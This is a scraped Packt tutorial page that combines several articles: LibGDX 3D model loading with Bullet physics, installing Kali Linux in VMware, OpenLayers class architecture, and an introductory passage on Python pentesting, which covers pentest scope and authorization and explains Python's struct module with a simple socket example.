The completed MyModelTest.java is as follows: public class MyModelTest extends ApplicationAdapter { public Environment environment; public PerspectiveCamera cam; public CameraInputController camController; public ModelBatch modelBatch; public Model model; public ModelInstance instance; public AssetManager assets; @Override public void create() { environment = new Environment(); environment.set(new ColorAttribute(ColorAttribute.AmbientLight, 0.4f, 0.4f, 0.4f, 1f)); environment.add(new DirectionalLight().set(0.8f, 0.8f, 0.8f, -1f, -0.8f, -0.2f)); modelBatch = new ModelBatch(); cam = new PerspectiveCamera(67, Gdx.graphics.getWidth(), Gdx.graphics.getHeight()); cam.position.set(1, 1, 1); cam.lookAt(0, 0, 0); cam.near = 1f; cam.far = 300f; cam.update(); assets = new AssetManager(); assets.load("car.g3dj", Model.class); assets.finishLoading(); model = assets.get("car.g3dj", Model.class); instance = new ModelInstance(model); camController = new CameraInputController(cam); Gdx.input.setInputProcessor(camController); } @Override public void render() { camController.update(); Gdx.gl.glViewport(0, 0, Gdx.graphics.getWidth(), Gdx.graphics.getHeight()); Gdx.gl.glClear(GL20.GL_COLOR_BUFFER_BIT | GL20.GL_DEPTH_BUFFER_BIT); modelBatch.begin(cam); modelBatch.render(instance, environment); modelBatch.end(); } @Override public void dispose() { modelBatch.dispose(); assets.dispose(); } } The new additions are highlighted. The following is a screenshot of the rendered scene. Use the W, S, A, and D keys and the mouse to navigate through the scene. Model formats and the FBX converter LibGDX supports three model formats, namely Wavefront OBJ, G3DJ, and G3DB. Wavefront OBJ models are intended for testing purposes only because this format does not include enough information for complex models. You can export your 3D model as .obj from any 3D animation or modeling software; however, LibGDX does not fully support .obj, so your own .obj model might not render correctly.
The G3DJ is a JSON textual format supported by LibGDX and can be used for debugging, whereas the G3DB is a binary format and is faster to load. One of the most popular model formats supported by any modeling software is FBX. LibGDX provides a tool called FBX converter to convert formats such as .obj and .fbx into the LibGDX supported formats .g3dj and .g3db. To convert car.fbx to a .g3db format, open the command line and call fbx-conv-win32, as shown in the following screenshot: Make sure that the fbx-conv-win32.exe file is in the same folder as car.fbx. Otherwise, you will have to use the full path of the source file to convert. To find out more about FBX converter visit https://github.com/libgdx/fbx-conv and https://github.com/libgdx/libgdx/wiki/3D-animations-and-skinning. Also, you can download FBX converter from http://libgdx.badlogicgames.com/fbx-conv. Creating a basic 3D scene Create a simple scene with a ball and ground, as shown in the following screenshot: Add the following code to MyCollisionTest.java: package com.packtpub.libgdx.collisiontest; import com.badlogic.gdx.ApplicationAdapter; import com.badlogic.gdx.Gdx; ... 
import com.badlogic.gdx.utils.Array; public class MyCollisionTest extends ApplicationAdapter { PerspectiveCamera cam; ModelBatch modelBatch; Array<Model> models; ModelInstance groundInstance; ModelInstance sphereInstance; Environment environment; ModelBuilder modelbuilder; @Override public void create() { modelBatch = new ModelBatch(); environment = new Environment(); environment.set(new ColorAttribute(ColorAttribute.AmbientLight, 0.4f, 0.4f, 0.4f, 1f)); environment.add(new DirectionalLight().set(0.8f, 0.8f, 0.8f, -1f, -0.8f, -0.2f)); cam = new PerspectiveCamera(67, Gdx.graphics.getWidth(), Gdx.graphics.getHeight()); cam.position.set(0, 10, -20); cam.lookAt(0, 0, 0); cam.update(); models = new Array<Model>(); modelbuilder = new ModelBuilder(); /* creating a ground model using a box shape */ float groundWidth = 40; modelbuilder.begin(); MeshPartBuilder mpb = modelbuilder.part("parts", GL20.GL_TRIANGLES, Usage.Position | Usage.Normal | Usage.Color, new Material(ColorAttribute.createDiffuse(Color.WHITE))); mpb.setColor(1f, 1f, 1f, 1f); mpb.box(0, 0, 0, groundWidth, 1, groundWidth); Model model = modelbuilder.end(); models.add(model); groundInstance = new ModelInstance(model); /* creating a sphere model */ float radius = 2f; final Model sphereModel = modelbuilder.createSphere(radius, radius, radius, 20, 20, new Material(ColorAttribute.createDiffuse(Color.RED), ColorAttribute.createSpecular(Color.GRAY), FloatAttribute.createShininess(64f)), Usage.Position | Usage.Normal); models.add(sphereModel); sphereInstance = new ModelInstance(sphereModel); sphereInstance.transform.trn(0, 10, 0); } public void render() { Gdx.gl.glViewport(0, 0, Gdx.graphics.getWidth(), Gdx.graphics.getHeight()); Gdx.gl.glClearColor(0, 0, 0, 1); Gdx.gl.glClear(GL20.GL_COLOR_BUFFER_BIT | GL20.GL_DEPTH_BUFFER_BIT); modelBatch.begin(cam); modelBatch.render(groundInstance, environment); modelBatch.render(sphereInstance, environment); modelBatch.end(); } @Override public void dispose() { modelBatch.dispose(); for
(Model model : models) model.dispose(); } } The ground is actually a thin box created using ModelBuilder just like the sphere. Now that we have created a simple 3D scene, let's add some physics using the following code: public class MyCollisionTest extends ApplicationAdapter { ... private btDefaultCollisionConfiguration collisionConfiguration; private btCollisionDispatcher dispatcher; private btDbvtBroadphase broadphase; private btSequentialImpulseConstraintSolver solver; private btDiscreteDynamicsWorld world; private Array<btCollisionShape> shapes = new Array<btCollisionShape>(); private Array<btRigidBodyConstructionInfo> bodyInfos = new Array<btRigidBody.btRigidBodyConstructionInfo>(); private Array<btRigidBody> bodies = new Array<btRigidBody>(); private btDefaultMotionState sphereMotionState; @Override public void create() { ... // Initiating Bullet Physics Bullet.init(); //setting up the world collisionConfiguration = new btDefaultCollisionConfiguration(); dispatcher = new btCollisionDispatcher(collisionConfiguration); broadphase = new btDbvtBroadphase(); solver = new btSequentialImpulseConstraintSolver(); world = new btDiscreteDynamicsWorld(dispatcher, broadphase, solver, collisionConfiguration); world.setGravity(new Vector3(0, -9.81f, 1f)); // creating ground body btCollisionShape groundshape = new btBoxShape(new Vector3(20, 1 / 2f, 20)); shapes.add(groundshape); btRigidBodyConstructionInfo bodyInfo = new btRigidBodyConstructionInfo(0, null, groundshape, Vector3.Zero); this.bodyInfos.add(bodyInfo); btRigidBody body = new btRigidBody(bodyInfo); bodies.add(body); world.addRigidBody(body); // creating sphere body sphereMotionState = new btDefaultMotionState(sphereInstance.transform); sphereMotionState.setWorldTransform(sphereInstance.transform); final btCollisionShape sphereShape = new btSphereShape(1f); shapes.add(sphereShape); bodyInfo = new btRigidBodyConstructionInfo(1, sphereMotionState, sphereShape, new Vector3(1, 1, 1)); this.bodyInfos.add(bodyInfo); body 
= new btRigidBody(bodyInfo); bodies.add(body); world.addRigidBody(body); } public void render() { Gdx.gl.glViewport(0, 0, Gdx.graphics.getWidth(), Gdx.graphics.getHeight()); Gdx.gl.glClearColor(0, 0, 0, 1); Gdx.gl.glClear(GL20.GL_COLOR_BUFFER_BIT | GL20.GL_DEPTH_BUFFER_BIT); world.stepSimulation(Gdx.graphics.getDeltaTime(), 5); sphereMotionState.getWorldTransform(sphereInstance.transform); modelBatch.begin(cam); modelBatch.render(groundInstance, environment); modelBatch.render(sphereInstance, environment); modelBatch.end(); } @Override public void dispose() { modelBatch.dispose(); for (Model model : models) model.dispose(); for (btRigidBody body : bodies) { body.dispose(); } sphereMotionState.dispose(); for (btCollisionShape shape : shapes) shape.dispose(); for (btRigidBodyConstructionInfo info : bodyInfos) info.dispose(); world.dispose(); collisionConfiguration.dispose(); dispatcher.dispose(); broadphase.dispose(); solver.dispose(); Gdx.app.log(this.getClass().getName(), "Disposed"); } } The highlighted parts are the addition to our previous code. After execution, we see the ball falling and colliding with the ground. Summary In this article, you learned how to load a 3D model of a car and created a basic 3D scene. Resources for Article: Further resources on this subject: Getting Started with GameSalad [article] Sparrow iOS Game Framework - The Basics of Our Game [article] Making Money with Your Game [article]

Packt

05 Feb 2015

1 min read

What is Kali Linux

This article by Aaron Johns, the author of Mastering Wireless Penetration Testing for Highly Secured Environments, introduces Kali Linux and the steps needed to get started. Kali Linux is a security penetration testing distribution built on Debian Linux. It includes a wide variety of security tools, organized by category. Let's begin by downloading and installing Kali Linux! (For more resources related to this topic, see here.)

Downloading Kali Linux

Congratulations, you have now started your first hands-on experience in this article! I'm sure you are excited so let's begin!

1. Visit http://www.kali.org/downloads/.
2. Look under the Official Kali Linux Downloads section. In this demonstration, I will be downloading and installing Kali Linux 1.0.6 32 Bit ISO.
3. Click on the Kali Linux 1.0.6 32 Bit ISO hyperlink to download it.

Depending on your Internet connection, this may take an hour to download, so plan ahead so that you are not left waiting on it. Those who have a slow Internet connection may want to consider downloading from a faster source in their local area. Restrictions on downloading may apply in public locations. Please make sure you have permission to download Kali Linux before doing so.

Installing Kali Linux in VMware Player

Once you have finished downloading Kali Linux, you will want to make sure you have VMware Player installed. VMware Player is where you will be installing Kali Linux. If you are not familiar with VMware Player, it is simply a type of virtualization software that runs a guest operating system without requiring another physical system. You can create multiple virtual machines and run them simultaneously. Perform the following steps:

1. Open VMware Player from your desktop. It should open and display a graphical user interface.
2. Click on Create a New Virtual Machine on the right.
3. Select I will install the operating system later and click on Next.
4. Select Linux and then Debian 7 from the drop-down menu.
5. Click on Next to continue.
6. Type Kali Linux for the virtual machine name.
7. Browse for the Kali Linux ISO file that was downloaded earlier, then click on Next.
8. Change the disk size from 25 GB to 50 GB and then click on Next.
9. Click on Finish. Kali Linux should now be displayed in your VMware Player library. From here, you can click on Customize Hardware... to increase the RAM or hard disk space, or change the network adapters according to your system's hardware.
10. Click on Play virtual machine.
11. Click on Player at the top-left and then navigate to Removable Devices | CD/DVD IDE | Settings….
12. Check the box next to Connected, select Use ISO image file, browse for the Kali Linux ISO, then click on OK.
13. Click on Restart VM at the bottom of the screen, or click on Player and then navigate to Power | Restart Guest.
14. After the virtual machine restarts, select Live (686-pae) and press Enter. It should boot into Kali Linux and take you to the desktop screen.

Congratulations! You have successfully installed Kali Linux.

Updating Kali Linux

Before we can get started with any of the demonstrations in this book, we must update Kali Linux so that its software packages are up to date.

1. Open VMware Player from your desktop.
2. Select Kali Linux and click on the green arrow to boot it.
3. Once Kali Linux has booted up, open a new Terminal window.
4. Type sudo apt-get update and press Enter.
5. Then type sudo apt-get upgrade and press Enter.
6. You will be prompted to specify if you want to continue. Type y and press Enter.
7. Repeat these commands until there are no more updates:
   sudo apt-get update
   sudo apt-get upgrade
   sudo apt-get dist-upgrade

Congratulations! You have successfully updated Kali Linux!

Summary

This was just the introduction to help prepare you before we get deeper into advanced technical demonstrations and hands-on examples. We did our first hands-on work with Kali Linux by installing it in VMware Player and updating it.

Resources for Article: Further resources on this subject: Veil-Evasion [article] Penetration Testing and Setup [article] Wireless and Mobile Hacks [article]

How-To Tutorials

Packt

04 Feb 2015

28 min read

Working with Incanter Datasets

Packt

04 Feb 2015

13 min read

OpenLayers' Key Components

In this article by Thomas Gratier, Paul Spencer, and Erik Hazzard, authors of the book OpenLayers 3 Beginner's Guide, we will look at the various components of OpenLayers, with a short description of each. (For more resources related to this topic, see here.) The OpenLayers library provides web developers with components useful for building web mapping applications. Following the principles of object-oriented design, these components are called classes. The relationship between all the classes in the OpenLayers library is part of the deliberate design, or architecture, of the library. There are two types of relationships that we, as developers using the library, need to know about: relationships between classes and inheritance between classes. Relationships between classes describe how classes, or more specifically, instances of classes, are related to each other. There are several different conceptual ways that classes can be related, but basically a relationship between two classes implies that one of the classes uses the other in some way, and often vice versa. Inheritance between classes shows how the behavior of classes, and their relationships, are shared with other classes. Inheritance is really just a way of sharing common behavior between several different classes. We'll start our discussion of the key components of OpenLayers by focusing on the first of these, the relationship between classes. We'll start by looking at the Map class, ol.Map. It's all about the map Instances of the Map class are at the center of every OpenLayers application. These objects are instances of the ol.Map class and they use instances of other classes to do their job, which is to put an interactive map onto a web page. Almost every other class in the OpenLayers library is related to the Map class, either directly or indirectly.
The following diagram illustrates the direct relationships that we are most interested in: The preceding diagram shows the most important relationships between the Map class and other classes it uses to do its job. It tells us several important things: A map has 0 or 1 view instances and it uses the name view to refer to it. A view may be associated with multiple maps, however. A map may have 0 or more instances of layers managed by a Collection class and a layer may be associated with 0 or one Map class. The Map class has a member variable named layers that it uses to refer to this collection. A map may have 0 or more instances of overlays managed by a Collection class and an overlay may be associated with 0 or one Map class. The Map class has a member variable named overlays that it uses to refer to this collection. A map may have 0 or more instances of controls managed by a class called ol.Collection and controls may be associated with 0 or one Map class. The Map class has a member variable named controls that it uses to refer to this collection. A map may have 0 or more instances of interactions managed by a Collection class and an interaction may be associated with 0 or one Map class. The Map class has a member variable named interactions that it uses to refer to this collection. Although these are not the only relationships between the Map class and other classes, these are the ones we'll be working with the most. The View class (ol.View) manages information about the current position of the Map class. If you are familiar with the programming concept of MVC (Model-View-Controller), be aware that the view class is not a View in the MVC sense. It does not provide the presentation layer for the map, rather it acts more like a controller (although there is not an exact parallel because OpenLayers was not designed with MVC in mind). The Layer class (ol.layer.Base) is the base class for classes that provide data to the map to be rendered. 
The Overlay class (ol.Overlay) is an interactive visual element like a control, but it is tied to a specific geographic position.

The Control class (ol.control.Control) is the base class for a group of classes that collectively allow a user to interact with the map. Controls have a visible user interface element (such as a button or a form input element) with which the user interacts.

The Interaction class (ol.interaction.Interaction) is the base class for a group of classes that also allow the user to interact with the map, but differ from controls in that they have no visible user interface element. For example, the DragPan interaction allows the user to click on and drag the map to pan around.

Controlling the Map's view

The OpenLayers view class, ol.View, represents a simple two-dimensional view of the world. It is responsible for determining where, and to some degree how, the user is looking at the world. It manages the following information:

- The geographic center of the map
- The resolution of the map, which is to say how much of the map we can see around the center
- The rotation of the map

Although you can create a map without a view, it won't display anything until a view is assigned to it. Every map must have a view in order to display any map data at all. However, a view may be shared between multiple instances of the Map class. This effectively synchronizes the center, resolution, and rotation of each of the maps. In this way, you can create two or more maps in different HTML containers on a web page, even showing different information, and have them look at the same world position. Changing the position of any of the maps (for instance, by dragging one) automatically updates the other maps at the same time.

Displaying map content

So, if the view is responsible for managing where the user is looking in the world, which component is responsible for determining what the user sees there?
That's the job of layers and overlays. A layer provides access to a source of geospatial data. There are two basic kinds of layers, raster and vector:

- In computer graphics, the term raster (raster graphics) refers to a digital image. In OpenLayers, a raster layer is one that displays images in your map at specific geographic locations.
- In computer graphics, the term vector (vector graphics) refers to images that are defined in terms of geometric shapes, such as points, lines, and polygons, or mathematical formulae such as Bézier curves. In OpenLayers, a vector layer reads geospatial data from a vector source (such as a KML file), and the data can then be drawn onto the map.

Layers are not the only way to display spatial information on the map. The other way is to use an overlay. We can create instances of ol.Overlay and add them to the map at specific locations. The overlay then positions its content (an HTML element) on the map at the specified location. The HTML element can then be used like any other HTML element. The most common use of overlays is to display spatially relevant information in a pop-up dialog in response to the mouse moving over, or clicking on, a geographic feature.

Interacting with the map

As mentioned earlier, the two components that allow users to interact with the map are interactions and controls. Let's look at them in a bit more detail.

Using interactions

Interactions are components that allow the user to interact with the map via some direct input, usually by using the mouse (or a finger with a touch screen). Interactions have no visible user interface.
The default set of interactions is:

- ol.interaction.DoubleClickZoom: If you double-click the left mouse button, the map will zoom in by a factor of 2
- ol.interaction.DragPan: If you drag the map, it will pan as you move the mouse
- ol.interaction.PinchRotate: On touch-enabled devices, placing two fingers on the device and rotating them in a circular motion will rotate the map
- ol.interaction.PinchZoom: On touch-enabled devices, placing two fingers on the device and pinching them together or spreading them apart will zoom the map out and in respectively
- ol.interaction.KeyboardPan: You can use the arrow keys to pan the map in the direction of the arrows
- ol.interaction.KeyboardZoom: You can use the + and - keys to zoom in and out
- ol.interaction.MouseWheelZoom: You can use the scroll wheel on a mouse to zoom the map in and out
- ol.interaction.DragZoom: If you hold the Shift key while dragging on the map, a rectangular region will be drawn, and when you release the mouse button, you will zoom into that area

Controls

Controls are components that allow the user to modify the map state via some visible user interface element, such as a button. In the examples we've seen so far, we've seen zoom buttons in the top-left corner of the map and an attribution control in the bottom-right corner of the map. In fact, the default controls are:

- ol.control.Zoom: This displays the zoom buttons in the top-left corner.
- ol.control.Rotate: This is a button to reset rotation to 0; by default, this is only displayed when the map's rotation is not 0.
- ol.control.Attribution: This displays attribution text for the layers currently visible in the map. By default, the attributions are collapsed to a single icon in the bottom-right corner, and clicking the icon will show the attributions.

This concludes our brief overview of the central components of an OpenLayers application.
We saw that the Map class is at the center of everything and that there are some key components (the view, layers, overlays, interactions, and controls) that it uses to accomplish its job of putting an interactive map onto a web page. At the beginning of this article, we talked about both relationships and inheritance. So far, we've only covered the relationships. In the next section, we'll show the inheritance architecture of the key components and introduce three classes that have been working behind the scenes to make everything work.

OpenLayers' super classes

In this section, we will look at three classes in the OpenLayers library that we won't often work with directly, but which provide an enormous amount of functionality to most of the other classes in the library. The first two classes, Observable and Object, are at the base of the inheritance tree for OpenLayers: the so-called super classes that most classes inherit from. The third class, Collection, isn't actually a super class but is used as the basis for many relationships between classes in OpenLayers. We've already seen that the Map class relationships with layers, overlays, interactions, and controls are managed by instances of the Collection class.

Before we jump into the details, take a look at the inheritance diagram for the components we've already discussed:

As you can see, the Observable class, ol.Observable, is the base class for every component of OpenLayers that we've seen so far. In fact, there are very few classes in the OpenLayers library that do not inherit from the Observable class or one of its subclasses. Similarly, the Object class, ol.Object, is the base class for many classes in the library and is itself a subclass of Observable.

The Observable and Object classes aren't very glamorous. You can't see them in action and they don't do anything very exciting from a user's perspective.
What they do, though, is provide two common sets of behavior that you can expect to be able to use on almost every object you create or access through the OpenLayers library: event management and Key-Value Observing (KVO).

Event management with the Observable class

An event is basically what it sounds like: something happening. Events are a fundamental part of how the various components of OpenLayers (the map, layers, controls, and pretty much everything else) communicate with each other. It is often important to know when something has happened and to react to it. One very useful type of event is a user-generated event, such as a mouse click or a touch on a mobile device's screen. Knowing when the user has clicked and dragged on the map allows some code to react to this and move the map to simulate panning it. Other types of events are internal, such as the map being moved or data finishing loading. To continue the previous example, once the map has moved to simulate panning, another event is issued by OpenLayers to say that the map has finished moving, so that other parts of OpenLayers can react by updating the user interface with the center coordinates or by loading more data.

Key-Value Observing with the Object class

OpenLayers' Object class inherits from Observable and implements a software pattern called Key-Value Observing (KVO). With KVO, an object representing some data maintains a list of other objects that wish to observe it. When the data value changes, the observers are notified automatically.

Working with Collections

The last section of this article is about the OpenLayers Collection class, ol.Collection. As mentioned, the Collection class is not a super class like Observable and Object, but it is an integral part of the relationship model. Many classes in OpenLayers make use of the Collection class to manage one-to-many relationships. At its core, the Collection class is a JavaScript array with additional convenience methods.
It also inherits directly from the Object class, and so has the functionality of both Observable and Object. This makes the Collection class extremely powerful.

Collection properties

The Collection class, which inherits from the Object class, has one observable property, length. When a collection changes (elements are added or removed), its length property is updated. This means it also emits an event, change:length, when the length property changes.

Collection events

The Collection class also inherits the functionality of the Observable class (via the Object class) and emits two other events: add and remove. Registered event handler functions for both events receive a single argument, a CollectionEvent, that has an element property with the element that was added or removed.

Summary

This wraps up our overview of the key concepts in the OpenLayers library. We took a quick look at the key components of the library from two different aspects: relationships and inheritance. With the Map class as the central object of any OpenLayers application, we looked at its main relationships to other classes, including views, layers, overlays, interactions, and controls. We briefly introduced each of these classes to give an overview of its primary purpose. We then investigated inheritance related to these objects and reviewed the super classes that provide functionality to most classes in the OpenLayers library: the Observable and Object classes. The Observable class provides a basic event mechanism, and the Object class adds observable properties with a powerful binding feature. Lastly, we looked at the Collection class. Although this isn't part of the inheritance structure, it is crucial to know how one-to-many relationships work throughout the library (including the Map class relationships with layers, overlays, interactions, and controls).


Packt

04 Feb 2015

22 min read

Pentesting Using Python

In this article by Mohit, author of the book Python Penetration Testing Essentials, we look at penetration testing with Python. Penetration (pen) tester and hacker are similar terms. The difference is that penetration testers work for an organization to prevent hacking attempts, while hackers hack for any purpose, such as fame, selling a vulnerability for money, or exploiting a vulnerability out of personal enmity.

Lots of well-trained hackers have got jobs in the information security field by hacking into a system and then informing the victim of the security bug(s) so that they might be fixed.

A hacker is called a penetration tester when they work for an organization or company to secure its system. A pentester performs hacking attempts to break the network after getting legal approval from the client and then presents a report of their findings. To become an expert in pentesting, a person should have deep knowledge of the concepts behind the technology they test.

Introducing the scope of pentesting

In simple words, penetration testing is testing the information security measures of a company. Information security measures cover a company's network, database, website, public-facing servers, security policies, and everything else specified by the client. At the end of the day, a pentester must present a detailed report of their findings, such as the weaknesses and vulnerabilities in the company's infrastructure and the risk level of each vulnerability, and provide solutions if possible.
The need for pentesting

There are several points that describe the significance of pentesting:

- Pentesting identifies the threats that might compromise the confidentiality of an organization
- Expert pentesting provides assurance to the organization with a complete and detailed assessment of organizational security
- Pentesting assesses the network's efficiency by producing a huge amount of traffic and scrutinizes the security of devices such as firewalls, routers, and switches
- Changing or upgrading the existing infrastructure of software, hardware, or network design might lead to vulnerabilities that can be detected by pentesting
- In today's world, potential threats are increasing significantly; pentesting is a proactive exercise to minimize the chance of being exploited
- Pentesting verifies whether suitable security policies are being followed

Consider an example of a well-reputed e-commerce company that makes money from online business. A hacker or group of black hat hackers finds a vulnerability in the company's website and hacks it. The loss the company will have to bear will be tremendous.

Components to be tested

An organization should conduct a risk assessment operation before pentesting; this will help identify the main threats, such as misconfiguration or vulnerability, in:

- Routers, switches, or gateways
- Public-facing systems: websites, DMZ, e-mail servers, and remote systems
- DNS, firewalls, proxy servers, FTP, and web servers

Testing should be performed on all hardware and software components of a network security system.

Qualities of a good pentester

The following points describe the qualities of a good pentester.
They should:

- Choose a suitable set of tests and tools that balance cost and benefits
- Follow suitable procedures with proper planning and documentation
- Establish the scope for each penetration test, such as objectives, limitations, and the justification of procedures
- Be ready to show how to exploit the vulnerabilities
- State the potential risks and findings clearly in the final report and provide methods to mitigate the risk if possible
- Keep themselves updated at all times because technology is advancing rapidly

A pentester tests the network using manual techniques or the relevant tools. There are lots of tools available in the market. Some of them are open source and some of them are highly expensive. With the help of programming, a programmer can make their own tools. By creating your own tools, you can clarify your understanding of the concepts and also perform more R&D. If you are interested in pentesting and want to make your own tools, then the Python programming language is an excellent choice: extensive, freely available pentesting packages exist for it, and it is easy to program in. This simplicity, along with third-party libraries such as scapy and mechanize, reduces code size. In Python, you don't need to define big classes to make a program, as you do in Java. It's more productive to write code in Python than in C, and high-level libraries are easily available for virtually any imaginable task.

If you know some programming in Python and are interested in pentesting, this book is ideal for you.

Defining the scope of pentesting

Before we get into pentesting, the scope of pentesting should be defined. The following points should be taken into account while defining the scope:

- You should develop the scope of the project in consultation with the client. For example, if Bob (the client) wants to test the entire network infrastructure of the organization, then pentester Alice would define the scope of pentesting by taking this network into account.
  Alice will consult Bob on whether any sensitive or restricted areas should be included or not.
- You should take into account time, people, and money.
- You should profile the test boundaries on the basis of an agreement signed by the pentester and the client.
- Changes in business practice might affect the scope. For example, the addition of a subnet, new system component installations, the addition or modification of a web server, and so on, might change the scope of pentesting.

The scope of pentesting is defined in two types of tests:

- A non-destructive test: This test is limited to finding vulnerabilities and carrying out the tests without any potential risks. It performs the following actions:
  - Scans and identifies the remote system for potential vulnerabilities
  - Investigates and verifies the findings
  - Maps the vulnerabilities with proper exploits
  - Exploits the remote system with proper care to avoid disruption
  - Provides a proof of concept
  - Does not attempt a Denial-of-Service (DoS) attack
- A destructive test: This test can produce risks.
  It performs the following actions:
  - Attempts DoS and buffer overflow attacks, which have the potential to bring down the system

Approaches to pentesting

There are three types of approaches to pentesting:

- Black-box pentesting follows a non-deterministic approach to testing
  - You will be given just a company name
  - It is like hacking with the knowledge of an outside attacker
  - There is no need for any prior knowledge of the system
  - It is time consuming
- White-box pentesting follows a deterministic approach to testing
  - You will be given complete knowledge of the infrastructure that needs to be tested
  - This is like working as a malicious employee who has ample knowledge of the company's infrastructure
  - You will be provided information on the company's infrastructure, network type, company's policies, do's and don'ts, the IP address, and the IPS/IDS firewall
- Gray-box pentesting follows a hybrid approach of black-box and white-box testing
  - The tester usually has limited information on the target network/system, which is provided by the client to lower costs and decrease trial and error on the part of the pentester
  - It performs the security assessment and testing internally

Introducing Python scripting

Before you start reading this book, you should know the basics of Python programming, such as the basic syntax, variable types, the tuple, list, and dictionary data types, functions, strings, methods, and so on. Two versions, 3.4 and 2.7.8, are available at python.org/downloads/.

In this book, all experiments and demonstrations have been done in Python 2.7.8. If you use a Linux distribution such as Kali or BackTrack, you will have no issues; many of the programs, such as those for wireless sniffing, do not work on the Windows platform. Kali Linux also uses version 2.7. If you love to work on Red Hat or CentOS, then this version is suitable for you.

Many hackers choose this profession because they don't want to do programming. They want to use tools.
However, without programming, a hacker cannot enhance their skills. Each time, they have to search the Internet for a tool. Believe me, after seeing its simplicity, you will love this language.

Understanding the tests and tools you'll need

To conduct scanning and sniffing pentesting, you will need a small network of attached devices. If you don't have a lab, you can make virtual machines on your computer. For wireless traffic analysis, you should have a wireless network. To conduct a web attack, you will need an Apache server running on the Linux platform. It is a good idea to use CentOS or Red Hat version 5 or 6 for the web server because these contain the RPMs of Apache and PHP. For the Python scripts, we will use the Wireshark tool, which is open source and can be run on Windows as well as Linux platforms.

Learning the common testing platforms with Python

You will now perform pentesting; I hope you are well acquainted with networking fundamentals such as IP addresses, classful subnetting, classless subnetting, the meaning of ports, network addresses, and broadcast addresses. A pentester must be strong in networking fundamentals and in at least one operating system; if you are thinking of using Linux, then you are on the right track. In this book, we will execute our programs on Windows as well as Linux: Windows, CentOS, and Kali Linux will be used.

A hacker always loves to work on a Linux system, as it is free and open source. Kali Linux marks the rebirth of BackTrack and is like an arsenal of hacking tools. Kali Linux NetHunter is the first open source Android penetration testing platform for Nexus devices. Some tools work on both Linux and Windows, but on Windows, you have to install those tools. I expect you to have knowledge of Linux. Now, it's time to work with networking in Python.
Implementing a network sniffer by using Python

Before learning about the implementation of a network sniffer, let's learn about two methods of the struct module:

- struct.pack(fmt, v1, v2, ...): This method returns a string that contains the values v1, v2, and so on, packed according to the given format
- struct.unpack(fmt, string): This method unpacks the string according to the given format

Let's discuss the code:

    import struct

    # Pack two short integers (h) and one long integer (l) into a binary string
    ms = struct.pack('hhl', 1, 2, 3)
    print (ms)

    # Unpack with the same format to recover the original values
    k = struct.unpack('hhl', ms)
    print k

The output for the preceding code is as follows:

    G:\Python\Networking\network>python str1.py
    ☺ ☻ ♥
    (1, 2, 3)

First, import the struct module, and then pack the integers 1, 2, and 3 in the hhl format. The packed values are raw binary data, much like machine code. Values are unpacked using the same hhl format; here, h means a short integer and l means a long integer. More details are provided in the subsequent sections.

Consider the situation of the client-server model; let's illustrate it by means of an example.

Run the struct1.py file. The server-side code is as follows:

    import socket
    import struct

    host = "192.168.0.1"
    port = 12347

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, port))
    s.listen(1)
    conn, addr = s.accept()
    print "connected by", addr

    msz = struct.pack('hhl', 1, 2, 3)   # pack the message
    conn.send(msz)                      # send the packed bytes
    conn.close()

The entire code is the same as we have seen previously, with msz= struct.pack('hhl', 1, 2, 3) packing the message and conn.send(msz) sending the message.

Run the unstruc.py file. The client-side code is as follows:

    import socket
    import struct

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    host = "192.168.0.1"
    port = 12347
    s.connect((host, port))

    msg = s.recv(1024)                  # receive the packed bytes
    print msg
    print struct.unpack('hhl', msg)     # unpack with the same format
    s.close()

The client-side code accepts the message and unpacks it in the given format.
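The packing, sending, and unpacking steps above can be tried on a single machine with the following sketch. It makes several assumptions that are not in the original listings: it is written for Python 3 rather than Python 2.7, it uses socket.socketpair() in place of the separate server and client scripts, and it adds the ! prefix to the format so that the packed size is the same on every platform. The round_trip name is hypothetical.

```python
import socket
import struct

FMT = "!hhl"  # network byte order: two 16-bit shorts and one 32-bit long


def round_trip(values):
    """Pack values, send them over a local socket pair, and unpack them."""
    sender, receiver = socket.socketpair()
    try:
        payload = struct.pack(FMT, *values)
        sender.sendall(payload)

        # Read exactly as many bytes as the format describes.
        size = struct.calcsize(FMT)
        data = b""
        while len(data) < size:
            chunk = receiver.recv(size - len(data))
            if not chunk:
                break
            data += chunk
        return payload, struct.unpack(FMT, data)
    finally:
        sender.close()
        receiver.close()


payload, unpacked = round_trip((1, 2, 3))
print(payload)
print(unpacked)
```

Reading until struct.calcsize(FMT) bytes have arrived is a design choice for stream sockets, where a single recv call is not guaranteed to return the whole message.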
The output for the client-side code is as follows:

    C:\network>python unstruc.py
    ☺ ☻ ♥
    (1, 2, 3)

The output for the server-side code is as follows:

    G:\Python\Networking\program>python struct1.py
    connected by ('192.168.0.11', 1417)

Now, you must have a fair idea of how to pack and unpack the data.

Format characters

We have seen the format in the pack and unpack methods. In the following table, the C Type and Python type columns denote the conversion between C and Python types. The Standard size column refers to the size of the packed value in bytes.

    Format  C Type              Python type         Standard size
    x       pad byte            no value
    c       char                string of length 1  1
    b       signed char         integer             1
    B       unsigned char       integer             1
    ?       _Bool               bool                1
    h       short               integer             2
    H       unsigned short      integer             2
    i       int                 integer             4
    I       unsigned int        integer             4
    l       long                integer             4
    L       unsigned long       integer             4
    q       long long           integer             8
    Q       unsigned long long  integer             8
    f       float               float               4
    d       double              float               8
    s       char[]              string
    p       char[]              string
    P       void *              integer

Let's check what will happen when one value is packed in different formats:

    >>> import struct
    >>> struct.pack('b',2)
    '\x02'
    >>> struct.pack('B',2)
    '\x02'
    >>> struct.pack('h',2)
    '\x02\x00'

We packed the number 2 in three different formats. From the preceding table, we know that b and B are 1 byte each, which means that they are the same size. However, h is 2 bytes.

Now, let's use the long long integer (q), which is 8 bytes:

    >>> struct.pack('q',2)
    '\x02\x00\x00\x00\x00\x00\x00\x00'

If we work on a network, ! should be used at the start of the format, as follows. The ! character selects network byte order (big-endian), which avoids confusion about whether the bytes are little-endian or big-endian. For more information on big-endian and little-endian, you can refer to the Wikipedia page on Endianness:

    >>> struct.pack('!q',2)
    '\x00\x00\x00\x00\x00\x00\x00\x02'
    >>>

You can see the difference when using ! in the format.

Before proceeding to sniffing, you should be aware of the following definitions:

- PF_PACKET: It operates at the device driver layer. The pcap library for Linux uses PF_PACKET sockets.
  To run this, you must be logged in as root. If you want to send and receive messages at the most basic level, below the Internet protocol layer, then you need to use PF_PACKET.
- Raw socket: It does not care about the network layer stack and provides a shortcut to send and receive packets directly to the application.

The following socket methods are used for byte-order conversion:

